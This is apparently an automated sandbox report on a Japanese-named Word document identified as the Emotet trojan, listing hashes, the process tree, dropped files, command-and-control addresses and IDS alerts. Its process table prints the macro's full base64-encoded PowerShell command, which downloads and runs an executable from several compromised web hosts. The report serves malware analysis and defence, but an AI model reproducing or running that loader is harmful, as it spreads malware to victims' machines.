File name: | 構造図.doc |
Full analysis: | https://app.any.run/tasks/cd57cb1a-c96d-442a-a44f-ed4648ccd86a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 20, 2020, 03:33:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Accusamus., Author: Lina Noel, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 20 01:15:00 2020, Last Saved Time/Date: Tue Oct 20 01:15:00 2020, Number of Pages: 1, Number of Words: 2064, Number of Characters: 11767, Security: 8 |
MD5: | EECE784BC9703193E9F0812E5BEA4A12 |
SHA1: | 3D376548C10DE858C84382DA1E77D748E25130ED |
SHA256: | A87B11057F5F368F21B06D60E9A37FDED4628321086AEF6C70755D753195FB3F |
SSDEEP: | 3072:/JivKie6B/w2yiWydwjXk/7p16zy+S9Sd+l4PJhERTM5/oKUQ2t1zJ3ASY9h9f:/JiP/w2PWXu7p16zy+S9Sd+l4PJhERTc |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
LocaleIndicator: | 1033 |
CodePage: | Unicode UTF-16, little endian |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 13804 |
Paragraphs: | 27 |
Lines: | 98 |
Company: | - |
Security: | Locked for annotations |
Characters: | 11767 |
Words: | 2064 |
Pages: | 1 |
ModifyDate: | 2020:10:20 00:15:00 |
CreateDate: | 2020:10:20 00:15:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Lina Noel |
Subject: | - |
Title: | Accusamus. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2940 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\構造図.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3688 | POwersheLL -ENCOD IABTAGUAVAAtAHYAYQByAEkAQQBCAGwARQAgACAAKAAiAHMAYgAiACsAIgBBACIAKQAgACgAWwB0AHkAcABlAF0AKAAnAHMAWQBzAFQAJwArACcARQBtAC4AJwArACcASQBPACcAKwAnAC4AJwArACcAZABpAFIAJwArACcARQBjAFQAbwByAHkAJwApACkAIAA7ACAAIABTAEUAVAAtAFYAYQByAGkAYQBiAGwAZQAgAFEATgBFAG8AZAAgACgAWwB0AHkAUABFAF0AKAAnAFMAeQAnACsAJwBzAHQARQBNAC4AJwArACcATgBFAFQALgBzACcAKwAnAEUAcgBWAEkAYwAnACsAJwBlAHAATwBpAG4AJwArACcAdABtACcAKwAnAEEATgBBACcAKwAnAEcAJwArACcARQByACcAKQApACAAIAA7ACAAIAAgACAAUwB2ACAAKAAiADEAIgArACIANgBVAEUAWQAiACkAIAAoACAAIABbAHQAWQBQAEUAXQAoACcAUwB5ACcAKwAnAHMAdABFAG0AJwArACcALgBOACcAKwAnAGUAVAAuAHMARQBjAHUAUgBJAHQAJwArACcAeQBQAHIAbwAnACsAJwB0AE8AQwBPACcAKwAnAEwAdAB5AFAAZQAnACkAKQAgADsAJABEAHcAMgB2AG4AdwBkAD0AKAAnAEwAJwArACcAMwBqAGYAXwBvADIAJwApADsAJABFAHYAMwBpAHQAMQB0AD0AJABKAGsAbwAyAHMAZwBvACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQAWABoAHMAcgBmADAAdQA7ACQASgA3AGQAOABfADkAMwA9ACgAJwBCACcAKwAnAHQAdgA4AGcAYgAnACsAJwByACcAKQA7ACAAKAAgACAARwBlAHQALQB2AGEAUgBJAEEAYgBMAGUAIAAgACgAIgBzAEIAIgArACIAQQAiACkAIAAtAFYAQQBMAHUAZQBvAG4AKQA6ADoAYwBSAGUAYQBUAGUAZABpAHIAZQBjAHQATwByAHkAKAAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACAAKwAgACgAKAAnAEIAJwArACcAMAAnACsAJwA2AFYAZgBnAF8AeQBwAGgAQgAwACcAKwAnADYAVgB5ADQAXwBxAGUAaQBCADAAJwArACcANgAnACkAIAAgAC0AcgBlAFAAbABBAEMAZQAgACAAKABbAGMAaABhAHIAXQA2ADYAKwBbAGMAaABhAHIAXQA0ADgAKwBbAGMAaABhAHIAXQA1ADQAKQAsAFsAYwBoAGEAcgBdADkAMgApACkAOwAkAFkAegB4AGYAMQBzAHAAPQAoACcARgB6AHoAJwArACcAZgBlACcAKwAnAHcAcwAnACkAOwAgACgARwBlAHQALQB2AEEAUgBJAGEAQgBsAEUAIABRAG4AZQBvAGQAIAApAC4AdgBhAGwAdQBFADoAOgBzAEUAYwB1AFIAaQBUAFkAUAByAE8AVABPAEMAbwBsACAAPQAgACAAJAAxADYAdQBlAFkAOgA6AFQATABzADEAMgA7ACQARgBoADUAZABrADUAZgA9ACgAJwBOAGcAJwArACcAegAnACsAJwBfAHcAcwA2ACcAKQA7ACQATQBlAHkAbQBmADAAMAAgAD0AIAAoACcAVABiAHUAcQBtACcAKwAnAHAAbQA2AHIAJwApADsAJABSAGsAagB3AGQAcABhAD0AKAAnAFIAXwBpAG4AZgBkACcAKwAnAHUAJwApADsAJABRAHUANABxAG0AMgA1AD0AKAAnAEsAYwBjACcAKwAnAGIAZgA0ADcAJwApADsAJABWADcAcQBpADcAegBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHcAOABkAFYAJwArACcAZgBnAF8AeQAnACsAJwBwAGgAdwA4AGQAJwArACcAVgB5ADQAXwBxACcAKwAnAGUAJwArACcAaQAnACsAJwB3ADgAZAAnACkALgBSAGUAcABMAGEAQwBFACgAJwB3ADgAZAAnACwAWwBTAFQAUgBJAE4AZwBdAFsAQwBoAEEAcgBdADkAMgApACkAKwAkAE0AZQB5AG0AZgAwADAAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAFEAZgBmADYAZgA4AGQAPQAoACcAWQB0ADQANwB4AG4AJwArACcANwAnACkAOwAkAEYAcAA5AHgANwA3AG0APQBOAEUAVwBgAC0AYABPAGIASgBFAEMAVAAgAG4ARQBUAC4AdwBFAGIAYwBMAEkARQBOAHQAOwAkAFAAbAB6AGgAegBiADkAPQAoACcAaAB0AHQAcABzADoALwAvAHEAdQBhAG4AdAB1ACcAKwAnAG0AZQAnACsAJwBkAHUALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvACcAKwAnADIANAAzADYAaQAnACsAJwBUAG0ANABhAGMALwAqAGgAJwArACcAdAB0AHAAJwArACcAcwA6AC8ALwBmAGEAcwB0AG0AbwB0AG8AcgAuACcAKwAnADAAMAAwACcAKwAnAHcAZQBiAGgAbwBzAHQAYQAnACsAJwBwAHAALgBjAG8AJwArACcAbQAvAHcAcAAtAGEAZAAnACsAJwBtACcAKwAnAGkAbgAvACcAKwAnAE4AJwArACcAeABvAFYANABZAEkAVQAvACoAaAB0ACcAKwAnAHQAcAAnACsAJwBzADoALwAvAGUAYwBvAGwAZQBrAC4AZQBlAC8AdwBwAC0AYQBkACcAKwAnAG0AaQBuAC8ARQBWADAAJwArACcAUAAvACcAKwAnACoAaAB0ACcAKwAnAHQAcAA6AC8ALwB3AHcAdwAuAHAAbwAnACsAJwByAG4AJwArACcAbQAnACsAJwBhAG4ALgBjAG8AbQAvAGkAbQBnAC8AQwAvACoAaAB0AHQAJwArACcAcABzADoALwAnACsAJwAvAGUAeAAnACsAJwBhACcAKwAnAG0AcwAnACsAJwBpAG4AZgBvAC4AaQAnACsAJwBuAC8AJwArACcAdwBwACcAKwAnAC0AYwBvACcAKwAnAG4AdABlAG4AdAAvAG8AJwArACcAaABVACcAKwAnADgAWgBEAEMAOAAnACsAJwBJAFgALwAqACcAKwAnAGgAdAB0AHAAOgAvAC8AZAAnACsAJwBlACcAKwAnAGEAbABzAG0AZQBkACcAKwAnAGkAYQAuAGkAbgAvACcAKwAnAHcAcAAtACcAKwAnAGMAbwAnACsAJwBuAHQAZQBuAHQALwBPAGIANwAzAHUASQAnACsAJwAvACoAaAB0AHQAJwArACcAcAA6AC8ALwBoAHAAdwAnACsAJwBkACcAKwAnAHkAJwArACcALgBjACcAKwAnAG8AbQAvACcAKwAnAGQAbwBjAHMALwBqAGMAZAB1AHQAJwArACcAagAnACsAJwBqAC8AJwApAC4AUwBQAGwASQBUACgAJABYAGUAMwAzAGIAYgA0ACAAKwAgACQARQB2ADMAaQB0ADEAdAAgACsAIAAkAE0AcQBoAGEAbgAwADAAKQA7ACQAQwBrADEAYQA5ADEAYwA9ACgAJwBMACcAKwAnAHUAcgAnACsAJwA1ADkAOQBoACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBvADMAbwAyADIAdwAgAGkAbgAgACQAUABsAHoAaAB6AGIAOQApAHsAdAByAHkAewAkAEYAcAA5AHgANwA3AG0ALgBEAE8AVwBOAEwAbwBBAGQAZgBJAGwAZQAoACQAUQBvADMAbwAyADIAdwAsACAAJABWADcAcQBpADcAegBnACkAOwAkAEUAdwBmAGIAYQBkADkAPQAoACcASgAnACsAJwBoACcAKwAnAG8AMQAxAGMAOAAnACkAOwBJAGYAIAAoACgARwBlAHQALQBgAEkAYABUAGUATQAgACQAVgA3AHEAaQA3AHoAZwApAC4ATABlAE4ARwBUAEgAIAAtAGcAZQAgADMAOQA2ADcAOAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwArACcAaQBuADMAJwArACcAMgBfAFAAcgBvAGMAZQBzAHMAJwApACkALgBjAFIARQBhAHQARQAoACQAVgA3AHEAaQA3AHoAZwApADsAJABYADMAbgB4ADcAdABnAD0AKAAnAEIAbAAnACsAJwBzAHUAXwBhACcAKwAnAHQAJwApADsAYgByAGUAYQBrADsAJABEADYAMgA1ADkANwBhAD0AKAAnAEMAJwArACcAeAAyAG0AbQBhAG8AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAGoAYQBmADYAcABrAD0AKAAnAFkAJwArACcAXwAwADMAcAAnACsAJwBjAG4AJwApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2120 | C:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exe | C:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3536 | "C:\Users\admin\AppData\Local\api-ms-win-service-management-l1-1-0\api-ms-win-core-file-l1-2-0.exe" | C:\Users\admin\AppData\Local\api-ms-win-service-management-l1-1-0\api-ms-win-core-file-l1-2-0.exe | Tbuqmpm6r.exe | |
User: admin Company: TODO: <Co Integrity Level: MEDIUM Description: TODO: <File descri Version: 1.0.0.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5141.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3688 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YRHX4TETG0LYKFEN919X.temp | — | |
MD5:— | SHA256:— | |||
3688 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$構造図.doc | pgc | |
MD5:A5A2BF5E261526BEDFC5FA4C278EB85C | SHA256:969B75FED076086FA27C8B79C736AAC8B2B5EBF187432C61844B5331BDBEF4B8 | |||
3688 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF165cbb.TMP | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:7FEC876094120C9AA85A60AD85871F5D | SHA256:05E10461FA0773EF1D2CE4D6E651F15C8072EB9B82234A4CBA9E92DBC8C13D85 | |||
2120 | Tbuqmpm6r.exe | C:\Users\admin\AppData\Local\api-ms-win-service-management-l1-1-0\api-ms-win-core-file-l1-2-0.exe | executable | |
MD5:08A3B52FD37E1F8DA7D5FA9B2AF34A8F | SHA256:ABDBD2C61A74F5A690B3234C1262EE4041115668809B92F19AB3AAAE259324ED | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A0860010A6FE4DC7FE532F8AFA2BDB29 | SHA256:9FA924A9569D4C1257CF0C196FAC64848011F32D82DC88B282BFA5625FED1B34 | |||
3688 | POwersheLL.exe | C:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exe | executable | |
MD5:08A3B52FD37E1F8DA7D5FA9B2AF34A8F | SHA256:ABDBD2C61A74F5A690B3234C1262EE4041115668809B92F19AB3AAAE259324ED |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3536 | api-ms-win-core-file-l1-2-0.exe | POST | — | 104.131.144.215:8080 | http://104.131.144.215:8080/TTDyPjqu8KhH5Ox/rzXdo75y8uzE5O7pZ/ | US | — | — | malicious |
3536 | api-ms-win-core-file-l1-2-0.exe | POST | — | 177.130.51.198:80 | http://177.130.51.198/zzsfYa96CfZHgl6/jf2a53HORJihkqT/ | BR | — | — | malicious |
3536 | api-ms-win-core-file-l1-2-0.exe | POST | — | 91.121.87.90:8080 | http://91.121.87.90:8080/PhjB/Ntu0OGPm/DRu0ApBgRmItsM/pXqNBWKFr/wnLrrHPbT/ | FR | — | — | malicious |
3536 | api-ms-win-core-file-l1-2-0.exe | POST | 200 | 188.226.165.170:8080 | http://188.226.165.170:8080/ZfDFdZheq/2orAzY4XH5Ejp/HxnVZ0UefMbfO5w/ChHJXh/ | NL | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3688 | POwersheLL.exe | 104.31.69.54:443 | quantumedu.com | Cloudflare Inc | US | unknown |
3688 | POwersheLL.exe | 145.14.144.71:443 | fastmotor.000webhostapp.com | Hostinger International Limited | US | shared |
3536 | api-ms-win-core-file-l1-2-0.exe | 177.130.51.198:80 | — | Wsp Serviços de Telecomunicações Ltda | BR | malicious |
— | — | 91.121.87.90:8080 | — | OVH SAS | FR | malicious |
3536 | api-ms-win-core-file-l1-2-0.exe | 188.226.165.170:8080 | — | Digital Ocean, Inc. | NL | malicious |
3536 | api-ms-win-core-file-l1-2-0.exe | 104.131.144.215:8080 | — | Digital Ocean, Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
quantumedu.com |
| unknown |
fastmotor.000webhostapp.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
3688 | POwersheLL.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
3536 | api-ms-win-core-file-l1-2-0.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |